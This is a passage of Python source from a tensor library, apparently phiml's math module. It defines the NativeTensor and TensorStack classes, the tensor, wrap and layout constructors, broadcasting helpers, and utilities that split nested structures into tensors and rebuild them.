@staticmethod\n def _recursive_op2(obj, shape: Shape, other, operator, native_function, op_name):\n if shape:\n dim = shape.names[0]\n if isinstance(other, Tensor) and dim in other.shape:\n assert other.shape.get_size(dim) == len(obj), f\"Shape mismatch during {op_name}: '{dim}' has size {len(obj)} on layout but {other.shape.get_size(dim)} on other tensor.\"\n others = [other[{dim: i}] for i in range(len(obj))]\n else:\n others = [other] * len(obj)\n if isinstance(obj, (tuple, list)):\n return type(obj)([Layout._recursive_op2(i, shape[1:], o, operator, native_function, op_name) for i, o in zip(obj, others)])\n elif isinstance(obj, dict):\n return {k: Layout._recursive_op2(v, shape[1:], o, operator, native_function, op_name) for (k, v), o in zip(obj.items(), others)}\n else: # leaf\n if isinstance(other, Layout) and not other.shape:\n return native_function(obj, other.native())\n if isinstance(other, Tensor):\n return operator(obj, other)\n else:\n return native_function(obj, other)\n\n def _op1(self, native_function):\n return Layout(self._recursive_op1(self._obj, self._shape, native_function), self._shape)\n\n @staticmethod\n def _recursive_op1(obj, shape: Shape, native_function):\n raise NotImplementedError\n # if shape:\n # if isinstance(obj, (tuple, list)):\n # return type(obj)([Layout._recursive_op1(i, shape[1:], native_function) for i in obj])\n # else:\n # else:\n # return native_function(obj)\n\n @staticmethod\n def _recursive_cast(obj, shape: Shape, dtype: DType):\n if shape:\n if isinstance(obj, (tuple, list)):\n return type(obj)([Layout._recursive_cast(i, shape[1:], dtype) for i in obj])\n elif isinstance(obj, dict):\n return {k: Layout._recursive_cast(v, shape[1:], dtype) for k, v in obj.items()}\n elif isinstance(obj, Tensor):\n assert obj.shape == shape\n from ._ops import cast\n return cast(obj, dtype)\n else:\n raise ValueError(obj)\n else:\n return dtype.kind(obj)\n\n\nclass NativeTensor(Tensor):\n \"\"\"\n Tensor backed by a (possibly lower-rank) backend-specific tensor.\n The dimension names and types corresponding to the native tensor are stored in _native_shape.\n The property _shape can contain additional dimensions along which the tensor is constant.\n \"\"\"\n\n def __init__(self, native_tensor, native_shape: Shape, expanded_shape: Shape = None):\n expanded_shape = native_shape if expanded_shape is None else expanded_shape\n if DEBUG_CHECKS:\n expanded_shape._check_is_valid_tensor_shape()\n backend = choose_backend(native_tensor)\n assert native_shape.is_uniform\n assert expanded_shape.is_uniform\n assert backend.staticshape(native_tensor) == native_shape.sizes, f\"Shape {native_shape} does not match native tensor with shape {backend.staticshape(native_tensor)}\"\n assert native_shape in expanded_shape\n self._native = native_tensor\n self._shape = expanded_shape\n self._native_shape = native_shape\n\n def native(self, order: Union[str, tuple, list, Shape] = None, singleton_for_const=False):\n order = parse_dim_order(order, check_rank=self.rank)\n order = self._shape.names if order is None else order\n assert isinstance(order, tuple) # should not be necessary\n assert all([n in order for n in self._native_shape.names]), f\"order must list all essential dimensions but got {order} for tensor {self.shape}\"\n backend = self.default_backend\n if order == self._native_shape.names:\n if self.dtype.precision in [None, get_precision()]:\n return self._native\n else:\n return backend.cast(self._native, DType(self.dtype.kind, precision=get_precision()))\n # --- Transpose ---\n perm = self._native_shape.only(order, reorder=False)._perm(self._native_shape.only(order, reorder=True).names)\n if perm != list(range(len(perm))):\n transposed = backend.transpose(self._native, perm) # this will cast automatically\n else:\n transposed = backend.as_tensor(self._native)\n if len(order) == len(perm):\n return transposed # nothing to expand\n # --- Expand ---\n slices = [slice(None) if dim in self._native_shape else None for dim in order]\n expanded = transposed[tuple(slices)]\n if not singleton_for_const:\n multiples = [self._shape.get_size(dim) if dim in self._shape and dim not in self._native_shape else 1 for dim in order]\n expanded = backend.tile(expanded, multiples)\n return expanded\n\n def _cache(self):\n if self._shape == self._native_shape:\n return\n self._native = self.native(order=self._shape)\n self._native_shape = self._shape\n\n def _cached(self, dims: Shape = None) -> 'NativeTensor':\n if dims is None or self._shape in (dims & self._native_shape):\n return NativeTensor(self.native(order=self._shape), self._shape, self._shape)\n else:\n new_native_shape = dims & self._native_shape\n tmp_tensor = NativeTensor(self._native, self._native_shape, new_native_shape)\n return NativeTensor(tmp_tensor.native(new_native_shape), new_native_shape, self._shape)\n\n @property\n def collapsed_dims(self):\n return self._shape.without(self._native_shape)\n\n @property\n def dtype(self):\n return choose_backend(self._native).dtype(self._native)\n\n @property\n def shape(self):\n return self._shape\n\n @property\n def default_backend(self) -> Backend:\n return choose_backend(self._native)\n\n def _with_shape_replaced(self, new_shape):\n if new_shape.rank != self._shape.rank:\n raise IncompatibleShapes(f\"Tensor {self} is not compatible with shape {new_shape}\", self._shape, new_shape)\n new_shape = Shape(self._shape.sizes, new_shape.names, new_shape.types, new_shape.item_names)\n native_indices = self._shape.indices(self._native_shape)\n new_native_shape = new_shape[native_indices]\n return NativeTensor(self._native, new_native_shape, new_shape)\n\n def _with_natives_replaced(self, natives: list):\n native = natives.pop(0)\n new_native_shape = self._native_shape.with_sizes(choose_backend(native).shape(native))\n new_shape = self._shape.with_sizes(new_native_shape)\n return NativeTensor(native, new_native_shape, new_shape)\n\n @property\n def _is_tracer(self) -> bool:\n return False\n\n def _to_dict(self):\n result = self.shape._to_dict(include_sizes=False)\n if self.rank == 0:\n result['data'] = self.numpy().item()\n else:\n result['data'] = self.numpy(self._shape).tolist() # works for all 1+ dimensional arrays\n return result\n\n def _getitem(self, selection: dict):\n if not selection:\n return self\n selections = [slice(None)] * self._native_shape.rank\n for name, sel in selection.items():\n if name in self._native_shape:\n selections[self._native_shape.index(name)] = sel\n elif name not in self._shape:\n assert isinstance(sel, int), f\"Attempting slice missing dimension {name} with {selection}\"\n gathered = self.default_backend.multi_slice(self._native, tuple(selections)) if selections else self._native\n new_native_shape = self._native_shape.after_gather(selection)\n new_shape = self._shape.after_gather(selection)\n return NativeTensor(gathered, new_native_shape, new_shape)\n\n def _unstack(self, dim):\n new_shape = self._shape.without(dim)\n new_native_shape = self._native_shape.without(dim)\n if dim in self._native_shape:\n tensors = self.default_backend.unstack(self._native, axis=self._native_shape.index(dim))\n return tuple([NativeTensor(t, new_native_shape, new_shape) for t in tensors])\n else:\n assert dim in self._shape, f\"Cannot unstack tensor {self._shape} along non-existant dimension '{dim}'\"\n return (NativeTensor(self._native, new_native_shape, new_shape),) * self._shape.get_size(dim)\n\n def _op1(self, native_function):\n native = native_function(self._native)\n return NativeTensor(native, self._native_shape, self._shape) if native is not None else self\n\n def _op2(self, other, operator, native_function, op_name: str = 'unknown', op_symbol: str = '?', switch_args=False):\n try:\n other_tensor = self._tensor(other)\n was_converted = not isinstance(other, Tensor)\n except NoBackendFound:\n return NotImplemented\n if not isinstance(other_tensor, NativeTensor) and not was_converted:\n return NotImplemented\n if not isinstance(other_tensor, NativeTensor):\n other_tensor = NativeTensor(other_tensor.native(other_tensor.shape), other_tensor.shape, other_tensor.shape)\n broadcast_shape = self._native_shape & other_tensor._native_shape\n natives = [t.native(order=broadcast_shape, singleton_for_const=True) if t.rank > 0 else t.native() for t in [self, other_tensor]]\n if switch_args:\n natives = natives[::-1]\n result_tensor = native_function(*natives)\n return NativeTensor(result_tensor, broadcast_shape, self._shape & other_tensor._shape)\n\n def _natives(self) -> tuple:\n return self._native,\n\n def _spec_dict(self) -> dict:\n return {'type': NativeTensor, 'native_shape': self._native_shape, 'shape': self._shape}\n\n @classmethod\n def _from_spec_and_natives(cls, spec: dict, natives: list):\n return NativeTensor(natives.pop(0), spec['native_shape'], spec['shape'])\n\n def _expand(self):\n self._cache()\n\n\nclass TensorStack(Tensor):\n \"\"\"\n Implicit stack of multiple tensors.\n List of tensors, does not store stacked tensor in memory.\n\n Args:\n\n Returns:\n\n \"\"\"\n\n def __init__(self, components: Union[tuple, list], stack_dim: Shape):\n assert isinstance(stack_dim, Shape) and stack_dim.rank == 1, f\"stack_dim must be a single-dimension Shape object but got {type(stack_dim)}\"\n # assert len(components) > 1, \"Use a CollapsedTensor instead\"\n for t in components:\n assert isinstance(t, Tensor)\n assert stack_dim.name not in t.shape, f\"Cannot stack along '{stack_dim.name}' because the dimension already exists.\"\n self._tensors = tuple(components)\n self._stack_dim = stack_dim.with_sizes([len(components)], keep_item_names=True)\n try:\n merge_shapes(*self._tensors)\n self._varying_shapes = False\n except IncompatibleShapes:\n self._varying_shapes = True\n self._shape = shape_stack(self._stack_dim, *[t.shape for t in self._tensors])\n self._cached = None\n\n @property\n def _is_tracer(self) -> bool:\n return any([t._is_tracer for t in self._tensors])\n\n @property\n def requires_broadcast(self):\n return self._varying_shapes or not self._shape.well_defined or self._is_tracer or self._tensors[0].shape.is_non_uniform\n \n @property\n def stack_dim(self):\n warnings.warn(\"TensorStack.stack_dim is deprecated. Use Shape.non_uniform instead.\", DeprecationWarning, stacklevel=2)\n return self._stack_dim\n\n def _cache(self):\n if self._cached is None:\n if self.requires_broadcast:\n return None\n elif all([t.shape.is_uniform for t in self._tensors]):\n natives = [t.native(order=self._shape.names) for t in self._tensors]\n native = choose_backend(*natives).concat(natives, axis=self.shape.index(self._stack_dim.name))\n self._cached = NativeTensor(native, self._shape)\n else: # cache stack_dim on inner tensors\n non_uniform_dim = self._tensors[0].shape.shape.without('dims')\n if len(non_uniform_dim) > 1:\n raise NotImplementedError\n unstacked = [t._unstack(non_uniform_dim.name) for t in self._tensors]\n stacked = []\n for to_stack in zip(*unstacked):\n tensor = TensorStack(to_stack, self._stack_dim)._cache()\n stacked.append(tensor)\n self._cached = TensorStack(stacked, non_uniform_dim)\n return self._cached\n\n @property\n def dtype(self):\n return combine_types(*[t.dtype for t in self._tensors])\n\n @property\n def shape(self):\n return self._shape\n\n def native(self, order: Union[str, tuple, list, Shape] = None, singleton_for_const=False):\n if self._cached is not None:\n return self._cached.native(order=order)\n else:\n order = parse_dim_order(order, check_rank=self.rank)\n # Is only the stack dimension shifted?\n if order is not None and self._shape.without(self._stack_dim).names == tuple(filter(lambda name: name != self._stack_dim.name, order)):\n inner_order = [dim for dim in order if dim != self._stack_dim.name]\n natives = [t.native(inner_order) for t in self._tensors]\n assert self._stack_dim.name in order, f\"Dimension {self._stack_dim} missing from 'order'. Got {order} but tensor has shape {self.shape}.\"\n native = choose_backend(*natives).stack(natives, axis=order.index(self._stack_dim.name))\n return native\n assert not self.shape.is_non_uniform, f\"Cannot convert non-uniform tensor with shape {self.shape} to native tensor.\"\n return self._cache().native(order=order)\n\n def _with_shape_replaced(self, new_shape: Shape):\n if self._cached is not None:\n return self._cached._with_shape_replaced(new_shape)\n else:\n new_stack_dim = new_shape[self._shape.index(self._stack_dim.name)]\n new_tensors = []\n for t in self._tensors:\n inner_indices = [self.shape.index(d) for d in t.shape.names]\n new_inner_shape = new_shape[inner_indices]\n new_tensors.append(t._with_shape_replaced(new_inner_shape))\n return TensorStack(new_tensors, new_stack_dim)\n\n def _getitem(self, selection: dict):\n if self._cached is not None:\n return self._cached._getitem(selection)\n if (self._stack_dim.name not in selection or len(selection) != 1) and not self.requires_broadcast:\n return self._cache()._getitem(selection)\n # --- Inner dims ---\n inner_dict = {dim: sel for dim, sel in selection.items() if dim != self._stack_dim.name}\n tensors = self._tensors\n if len(inner_dict) > 0:\n tensors = [t[inner_dict] for t in tensors]\n # --- stack dimension ---\n if self._stack_dim.name in selection:\n selection = selection[self._stack_dim.name]\n if isinstance(selection, int):\n return tensors[selection]\n elif isinstance(selection, slice):\n return TensorStack(tensors[selection], self._stack_dim)\n else:\n raise NotImplementedError(f\"{type(selection)} not supported. Only (int, slice) allwoed\")\n else:\n return TensorStack(tensors, self._stack_dim)\n\n def _unstack(self, dim):\n if self._cached is not None:\n return self._cached._unstack(dim)\n if dim == self._stack_dim.name:\n return self._tensors\n else:\n if self.requires_broadcast:\n unstacked = [t._unstack(dim) for t in self._tensors]\n return tuple([TensorStack(items, self._stack_dim) for items in zip(*unstacked)])\n else:\n return self._cache()._unstack(dim)\n\n def _op1(self, native_function):\n if self.requires_broadcast:\n tensors = [t._op1(native_function) for t in self._tensors]\n return TensorStack(tensors, self._stack_dim)\n else:\n return self._cache()._op1(native_function)\n\n def _op2(self, other, operator, native_function, op_name: str = 'unknown', op_symbol: str = '?'):\n other = self._tensor(other)\n if self.requires_broadcast:\n if self._stack_dim.name in other.shape:\n other_slices = other._unstack(self._stack_dim.name)\n tensors = [operator(t1, t2) for t1, t2 in zip(self._tensors, other_slices)]\n else:\n tensors = [operator(t, other) for t in self._tensors]\n return TensorStack(tensors, self._stack_dim)\n elif isinstance(other, NativeTensor) or (isinstance(other, TensorStack) and not other.requires_broadcast):\n new_shape, (native1, native2) = broadcastable_native_tensors(self, other) # ToDo we don't have to expand all\n result_tensor = native_function(native1, native2)\n return NativeTensor(result_tensor, new_shape, new_shape)\n elif isinstance(other, TensorStack) and other.requires_broadcast:\n if other._stack_dim.name in self.shape:\n self_slices = self._unstack(other._stack_dim.name)\n tensors = [operator(t1, t2) for t1, t2 in zip(self_slices, other._tensors)]\n else:\n tensors = [operator(self, t) for t in other._tensors]\n return TensorStack(tensors, self._stack_dim)\n else:\n return NotImplemented\n\n def _natives(self) -> tuple:\n if self._cached is not None:\n return self._cached._natives()\n else:\n return sum([t._natives() for t in self._tensors], ())\n\n def _spec_dict(self) -> dict:\n if self._cached is not None:\n return self._cached._spec_dict()\n else:\n return {'type': TensorStack, 'stack_dim': self._stack_dim, 'tensors': [t._spec_dict() for t in self._tensors]}\n\n @classmethod\n def _from_spec_and_natives(cls, spec: dict, natives: list):\n tensors = [t['type']._from_spec_and_natives(t, natives) for t in spec['tensors']]\n return TensorStack(tensors, spec['stack_dim'])\n\n def _with_natives_replaced(self, natives: list):\n if self._cached is not None:\n return self._cached._with_natives_replaced(natives)\n else:\n tensors = [t._with_natives_replaced(natives) for t in self._tensors]\n return TensorStack(tensors, self._stack_dim)\n\n def _expand(self):\n if self.requires_broadcast:\n for t in self._tensors:\n t._expand()\n self._cache()\n\n @property\n def is_cached(self):\n return self._cached is not None\n\n def _simplify(self):\n if self.is_cached:\n return self._cached\n else:\n return self\n\n\ndef tensor(data,\n *shape: Shape,\n convert: bool = True,\n default_list_dim=channel('vector')) -> Tensor: # TODO assume convert_unsupported, add convert_external=False for constants\n \"\"\"\n Create a Tensor from the specified `data`.\n If `convert=True`, converts `data` to the preferred format of the default backend.\n\n `data` must be one of the following:\n \n * Number: returns a dimensionless Tensor.\n * Native tensor such as NumPy array, TensorFlow tensor or PyTorch tensor.\n * `tuple` or `list` of numbers: backs the Tensor with native tensor.\n * `tuple` or `list` of non-numbers: creates tensors for the items and stacks them.\n * Tensor: renames dimensions and dimension types if `names` is specified. Converts all internal native values of the tensor if `convert=True`.\n * Shape: creates a 1D tensor listing the dimension sizes.\n \n While specifying `names` is optional in some cases, it is recommended to always specify them.\n \n Dimension types are always inferred from the dimension names if specified.\n\n Implementations:\n\n * NumPy: [`numpy.array`](https://numpy.org/doc/stable/reference/generated/numpy.array.html)\n * PyTorch: [`torch.tensor`](https://pytorch.org/docs/stable/generated/torch.tensor.html), [`torch.from_numpy`](https://pytorch.org/docs/stable/generated/torch.from_numpy.html)\n * TensorFlow: [`tf.convert_to_tensor`](https://www.tensorflow.org/api_docs/python/tf/convert_to_tensor)\n * Jax: [`jax.numpy.array`](https://jax.readthedocs.io/en/latest/_autosummary/jax.numpy.array.html)\n\n See Also:\n `phiml.math.wrap()` which uses `convert=False`, `layout()`.\n\n Args:\n data: native tensor, scalar, sequence, Shape or Tensor\n shape: Ordered dimensions and types. If sizes are defined, they will be checked against `data`.`\n convert: If True, converts the data to the native format of the current default backend.\n If False, wraps the data in a `Tensor` but keeps the given data reference if possible.\n\n Raises:\n AssertionError: if dimension names are not provided and cannot automatically be inferred\n ValueError: if `data` is not tensor-like\n\n Returns:\n Tensor containing same values as data\n\n Examples:\n >>> tensor([1, 2, 3], channel(vector='x,y,z'))\n (x=1, y=2, z=3)\n\n >>> tensor([1., 2, 3], channel(vector='x,y,z'))\n (x=1.000, y=2.000, z=3.000) float64\n\n >>> tensor(numpy.zeros([10, 8, 6, 2]), batch('batch'), spatial('x,y'), channel(vector='x,y'))\n (batchᵇ=10, xˢ=8, yˢ=6, vectorᶜ=x,y) float64 const 0.0\n\n >>> tensor([(0, 1), (0, 2), (1, 3)], instance('particles'), channel(vector='x,y'))\n (x=0, y=1); (x=0, y=2); (x=1, y=3) (particlesⁱ=3, vectorᶜ=x,y)\n\n >>> tensor(numpy.random.randn(10))\n (vectorᶜ=10) float64 -0.128 ± 1.197 (-2e+00...2e+00)\n \"\"\"\n assert all(isinstance(s, Shape) for s in shape), f\"Cannot create tensor because shape needs to be one or multiple Shape instances but got {shape}\"\n shape = None if len(shape) == 0 else concat_shapes(*shape)\n if isinstance(data, Tensor):\n if convert:\n backend = data.default_backend\n if backend != default_backend():\n data = data._op1(lambda n: convert_(n, use_dlpack=False))\n if shape is None:\n return data\n else:\n if None in shape.sizes:\n shape = shape.with_sizes(data.shape.sizes)\n return data._with_shape_replaced(shape)\n elif isinstance(data, Shape):\n if shape is None:\n shape = channel('dims')\n shape = shape.with_size(data.names)\n data = data.sizes\n elif not shape:\n assert data.rank == 1, f\"When wrapping a Shape as a scalar tensor, it must be a rank-1 shape but got {data}\"\n data = data.size\n else:\n assert shape.rank == 1, \"Can only convert 1D shapes to Tensors\"\n shape = shape.with_size(data.names)\n data = data.sizes\n elif isinstance(data, str) or data is None:\n return layout(data)\n elif isinstance(data, (numbers.Number, bool)):\n assert not shape, f\"Trying to create a zero-dimensional Tensor from value '{data}' but shape={shape}\"\n if convert:\n data = default_backend().as_tensor(data, convert_external=True)\n return NativeTensor(data, EMPTY_SHAPE)\n if isinstance(data, (tuple, list)):\n if all(isinstance(d, (bool, int, float, complex)) for d in data):\n array = np.array(data)\n assert array.dtype != object\n data = array\n elif all(isinstance(d, str) for d in data):\n return layout(data, shape or default_list_dim)\n else:\n try:\n inner_shape = [] if shape is None else [shape[1:]]\n tensors = [d if isinstance(d, Tensor) else tensor(d, *inner_shape, convert=convert) for d in data]\n return stack(tensors, default_list_dim if shape is None else shape[0].with_sizes([len(tensors)]), expand_values=True)\n except IncompatibleShapes:\n assert not convert, f\"Cannot convert {data} to tensor given shape {shape}\"\n return layout(data, shape or default_list_dim)\n except ValueError:\n assert not convert, f\"Cannot convert {data} to tensor\"\n return layout(data, shape or default_list_dim)\n try:\n backend = choose_backend(data)\n if shape is None:\n assert backend.ndims(data) <= 1, \"Specify dimension names for tensors with more than 1 dimension\"\n shape = default_list_dim if backend.ndims(data) == 1 else EMPTY_SHAPE\n shape = shape.with_sizes(backend.staticshape(data))\n else:\n # fill in sizes or check them\n sizes = backend.staticshape(data)\n if len(sizes) != len(shape):\n raise IncompatibleShapes(f\"Rank of given shape {shape} does not match data with sizes {sizes}\")\n for size, s in zip(sizes, shape.sizes):\n if s is not None:\n assert s == size, f\"Given shape {shape} does not match data with sizes {sizes}. Consider leaving the sizes undefined.\"\n shape = shape.with_sizes(sizes, keep_item_names=True)\n if convert:\n data = convert_(data, use_dlpack=False)\n return NativeTensor(data, shape)\n except NoBackendFound:\n raise ValueError(f\"{type(data)} is not supported. Only (Tensor, tuple, list, np.ndarray, native tensors) are allowed.\\nCurrent backends: {BACKENDS}\")\n\n\ndef wrap(data,\n *shape: Shape) -> Tensor:\n \"\"\" Short for `phiml.math.tensor()` with `convert=False`. \"\"\"\n return tensor(data, *shape, convert=False) # TODO inline, simplify\n\n\ndef layout(objects, *shape: Shape) -> Tensor:\n \"\"\"\n Wraps a Python tree in a `Tensor`, allowing elements to be accessed via dimensions.\n A python tree is a structure of nested `tuple`, `list`, `dict` and *leaf* objects where leaves can be any Python object.\n\n All keys of `dict` containers must be of type `str`.\n The keys are automatically assigned as item names along that dimension unless conflicting with other elements.\n\n Strings may also be used as containers.\n\n Example:\n >>> t = layout({'a': 'text', 'b': [0, 1]}, channel('dict,inner'))\n >>> t.inner[1].dict['a'].native()\n 'e'\n\n See Also:\n `tensor()`, `wrap()`.\n\n Args:\n objects: PyTree of `list` or `tuple`.\n *shape: Tensor dimensions\n\n Returns:\n `Tensor`.\n Calling `Tensor.native()` on the returned tensor will return `objects`.\n \"\"\"\n assert all(isinstance(s, Shape) for s in shape), f\"shape needs to be one or multiple Shape instances but got {shape}\"\n shape = EMPTY_SHAPE if len(shape) == 0 else concat_shapes(*shape)\n if isinstance(objects, Layout):\n assert objects.shape == shape\n return objects\n\n if not shape.well_defined:\n\n def recursive_determine_shape(native, shape: Shape):\n if not shape:\n return shape\n if isinstance(native, dict):\n assert all([isinstance(k, str) for k in native.keys()]), f\"All dict keys in PyTrees must be str but got {tuple(native.keys())}\"\n shape = shape.replace(shape[0], shape[0].with_size(tuple(native.keys())))\n if shape.rank == 1:\n return shape.with_sizes((len(native),))\n inner_shape = shape[1:]\n if isinstance(native, (tuple, list)):\n inner_shapes = [recursive_determine_shape(n, inner_shape) for n in native]\n elif isinstance(native, dict):\n inner_shapes = [recursive_determine_shape(n, inner_shape) for n in native.values()]\n else:\n raise ValueError(native)\n return shape_stack(shape[0], *inner_shapes)\n\n shape = recursive_determine_shape(objects, shape)\n\n return Layout(objects, shape)\n # if shape.volume == 1:\n # objects = np.asarray(objects, dtype=object)\n #\n # if isinstance(objects, (tuple, list)):\n # objects = np.asarray(objects, dtype=object)\n # if isinstance(objects, np.ndarray) and objects.dtype == object:\n # return Layout(objects, shape)\n # else:\n # assert shape.volume == 1, f\"Cannot layout object of type {objects} along {shape}, a tuple, list or object array is required.\"\n\n\ndef compatible_tensor(data, compat_shape: Shape = None, compat_natives=(), convert=False):\n if isinstance(data, Tensor):\n return data\n elif isinstance(data, Shape):\n if data.spatial.rank == 1:\n return wrap(data.spatial.size)\n assert compat_shape.channel.rank == 1, \"Only single-channel tensors support implicit casting from Shape to tensor\"\n assert data.rank == compat_shape.channel.volume\n return wrap(data.spatial.sizes, *compat_shape.channel.with_size(data.names))\n else:\n data_type = type(data)\n backend = choose_backend(*compat_natives, data)\n try:\n data = backend.as_tensor(data, convert_external=convert)\n shape = backend.staticshape(data)\n except ValueError as e:\n raise ValueError(e)\n if len(shape) == 0:\n return NativeTensor(data, EMPTY_SHAPE)\n elif isinstance(data, (tuple, list)): # always channel, add vector if not available\n data = backend.as_tensor(data)\n if len(shape) == compat_shape.channel_rank:\n other_tensor = wrap(data, compat_shape.channel)\n return other_tensor\n if compat_shape.channel_rank > 1 and len(shape) == 1 and 'vector' in compat_shape.channel:\n return wrap(data, compat_shape['vector'].without_sizes())\n elif len(shape) == compat_shape.rank:\n if len(shape) > 1:\n warnings.warn(f\"Combining a phiml.math.Tensor with a {data_type} of same shape is not invariant under shape permutations. Please convert the {data_type} to a phiml.math.Tensor first. Shapes: {shape} and {compat_shape}\", SyntaxWarning, stacklevel=5)\n return NativeTensor(data, compat_shape.with_sizes(shape))\n else:\n raise ValueError(f\"Cannot combine tensor of shape {shape} with tensor of shape {compat_shape}\")\n\n\ndef broadcastable_native_tensors(*tensors):\n \"\"\"\n Expands and transposes the dimensions of the given tensors so that they all have the same dimension order.\n\n Args:\n *tensors: sequence of Tensors\n\n Returns:\n shape, native tensors)\n\n \"\"\"\n from ._sparse import SparseCoordinateTensor, CompressedSparseMatrix, dense\n if any(isinstance(t, (SparseCoordinateTensor, CompressedSparseMatrix)) for t in tensors) and not all(isinstance(t, (SparseCoordinateTensor, CompressedSparseMatrix)) for t in tensors):\n tensors = [dense(t) for t in tensors]\n broadcast_shape = merge_shapes(*[t.shape for t in tensors])\n natives = [t.native(order=broadcast_shape.names) if t.rank > 0 else t.native() for t in tensors]\n return broadcast_shape, natives\n\n\ndef custom_op2(x: Union[Tensor, float], y: Union[Tensor, float], l_operator, l_native_function, r_operator=None, r_native_function=None, op_name: str = 'unknown', op_symbol: str = None) -> Tensor:\n \"\"\"\n Perform a custom operator on two tensors.\n This method first tries calling _op2() on the first tensor and if that fails, tries it on the second tensor.\n\n Args:\n x: Left argument\n y: Right argument\n l_operator: Operator function acting on Tensors\n l_native_function: Operator function acting on natives\n r_operator: Argument-reversed operator function acting on Tensors\n r_native_function: Argument-reversed operator function acting on natives\n op_name: Name of the operator function for debugging purposes. Leading 'r' will be added for the operand-reversed version.\n op_symbol: Short name for the operator, independent of argument order.\n\n Returns:\n `Tensor`\n \"\"\"\n if op_symbol is None:\n op_symbol = op_name\n x = wrap(x)\n y = wrap(y)\n result = x._op2(y, l_operator, l_native_function, op_name, op_symbol)\n if result is NotImplemented:\n if r_operator is None:\n r_operator = lambda a, b: l_operator(b, a)\n if r_native_function is None:\n r_native_function = lambda a, b: l_native_function(b, a)\n result = y._op2(x, r_operator, r_native_function, f'r{op_name}', op_symbol)\n if result is NotImplemented:\n raise NotImplementedError(f\"Operation not supported between {type(x)} and {type(y)}\")\n return result\n\n\ndef disassemble_tensors(tensors: Union[Tuple[Tensor, ...], List[Tensor]], expand: bool) -> Tuple[tuple, Tuple[Shape], tuple]:\n \"\"\"\n Args:\n tensors: Tuple or list of Tensors.\n expand: Whether to add collapsed dimensions to the native tensors.\n\n Returns:\n natives: tuple of native tensors\n specs: Identification primitives from which the tensor can be reconstructed given the natives.\n One per tensor.\n \"\"\"\n for t in tensors:\n if isinstance(t, TensorStack) or expand:\n t._expand()\n natives = sum([t._natives() for t in tensors], ())\n shapes = tuple([t.shape for t in tensors])\n specs = tuple([t._spec_dict() for t in tensors])\n return natives, shapes, specs\n\n\ndef assemble_tensors(natives: Union[tuple, list], specs: Union[Tuple[dict, ...], List[dict]]):\n natives = list(natives)\n result = []\n for spec in specs:\n t = spec['type']._from_spec_and_natives(spec, natives)\n result.append(t)\n return result\n\n\nMISSING_TENSOR = 'missing'\nNATIVE_TENSOR = 'native'\n\n\ndef disassemble_tree(obj: PhiTreeNodeType) -> Tuple[PhiTreeNodeType, List[Tensor]]:\n \"\"\"\n Splits a nested structure of Tensors into the structure without the tensors and an ordered list of tensors.\n Native tensors will be wrapped in phiml.math.Tensors with default dimension names and dimension types `None`.\n\n See Also:\n `assemble_tree()`\n\n Args:\n obj: Nested structure of `Tensor` objects.\n Nested structures include: `tuple`, `list`, `dict`, `phiml.math.magic.PhiTreeNode`.\n\n Returns:\n empty structure: Same structure as `obj` but with the tensors replaced by `None`.\n tensors: Ordered `list` of all contained `Tensor` objects.\n \"\"\"\n if obj is None:\n return MISSING_TENSOR, []\n elif isinstance(obj, Tensor):\n return None, [obj]\n elif isinstance(obj, (tuple, list)):\n keys = []\n values = []\n for item in obj:\n key, value = disassemble_tree(item)\n keys.append(key)\n values.extend(value)\n return (tuple(keys) if isinstance(obj, tuple) else keys), values\n elif isinstance(obj, dict):\n keys = {}\n values = []\n for name, item in obj.items():\n key, value = disassemble_tree(item)\n keys[name] = key\n values.extend(value)\n return keys, values\n elif isinstance(obj, PhiTreeNode):\n attributes = variable_attributes(obj)\n keys = {}\n values = []\n for attr in attributes:\n key, value = disassemble_tree(getattr(obj, attr))\n keys[attr] = key\n values.extend(value)\n return copy_with(obj, **keys), values\n else:\n try:\n backend = choose_backend(obj)\n if backend == OBJECTS:\n return obj, []\n sizes = backend.staticshape(obj)\n shape = Shape(sizes, tuple([f\"dim{i}\" for i in range(len(sizes))]), (None,) * len(sizes), (None,) * len(sizes))\n return NATIVE_TENSOR, [NativeTensor(obj, shape)]\n except NoBackendFound:\n return obj, []\n\n\ndef assemble_tree(obj: PhiTreeNodeType, values: List[Tensor]) -> PhiTreeNodeType:\n \"\"\" Reverses `disassemble_tree()` given an empty nested structure and a list of tensors. \"\"\"\n if obj is MISSING_TENSOR:\n return None\n elif obj is NATIVE_TENSOR:\n value = values.pop(0)\n assert isinstance(value, NativeTensor), f\"Failed to assemble tree structure. Encountered {value}\"\n return value._native\n elif obj is None:\n value = values.pop(0)\n assert isinstance(value, Tensor)\n return value\n elif isinstance(obj, list):\n return [assemble_tree(item, values) for item in obj]\n elif isinstance(obj, tuple):\n return tuple([assemble_tree(item, values) for item in obj])\n elif isinstance(obj, dict):\n return {name: assemble_tree(val, values) for name, val in obj.items()}\n elif isinstance(obj, PhiTreeNode):\n attributes = variable_attributes(obj)\n values = {a: assemble_tree(getattr(obj, a), values) for a in attributes}\n return copy_with(obj, **values)\n else:\n return obj\n\n\ndef cached(t: TensorOrTree) -> TensorOrTree:\n assert isinstance(t, (Tensor, PhiTreeNode)), f\"All arguments must be Tensors but got {type(t)}\"\n if isinstance(t, NativeTensor):\n return t._cached()\n elif isinstance(t, TensorStack):\n if t._cached is not None:\n return t._cached\n inners = cached(t._tensors)\n if t.requires_broadcast:\n return TensorStack(inners, t._stack_dim)\n else:\n natives = [t.native(order=t.shape.names) for t in inners]\n native = choose_backend(*natives).stack(natives, axis=t.shape.index(t._stack_dim.name))\n return NativeTensor(native, t.shape)\n elif isinstance(t, Layout):\n return t\n elif isinstance(t, PhiTreeNode):\n tree, tensors = disassemble_tree(t)\n tensors_ = [cached(t_) for t_ in tensors]\n return assemble_tree(tree, tensors_)\n else:\n raise AssertionError(f\"Cannot cache {type(t)} {t}\")\n\n\ndef expand_tensor(value: Tensor, dims: Shape):\n if not dims:\n return value\n dims.assert_all_sizes_defined()\n if isinstance(value, NativeTensor):\n if dims.is_uniform:\n return NativeTensor(value._native, value._native_shape, dims & value._shape)\n else:\n stack_dim = dims.shape.without('dims')\n if stack_dim.rank > 1:\n raise NotImplementedError(\"Higher-order non-uniform expand() not yet supported\")\n unstacked_dims = [dims.after_gather(i) for i in stack_dim.meshgrid()]\n components = [NativeTensor(value._native, value._native_shape, inner_shape) for inner_shape in unstacked_dims]\n return TensorStack(components, stack_dim)\n if isinstance(value, TensorStack):\n expanded = [expand_tensor(v, dims.without(value.stack_dim)) for v in value._tensors]\n return TensorStack(expanded, value.stack_dim)\n raise NotImplementedError\n\n\nclass Dict(dict):\n \"\"\"\n Dictionary of `Tensor` or `phiml.math.magic.PhiTreeNode` values.\n Dicts are not themselves tensors and do not have a shape.\n Use 